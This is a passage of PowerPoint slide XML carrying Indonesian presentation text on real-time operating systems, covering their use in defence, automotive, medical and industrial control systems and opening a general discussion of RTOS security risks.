              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemandu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rudal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>FreeRTOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>robotika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomotif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transmisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keselamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AUTOSAR (Automotive Open System Architecture) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomotif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>medis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencitraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>medis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>obat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pabrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Siemens SIMATIC WinCC Open Architecture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keandalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> RTOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RTOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
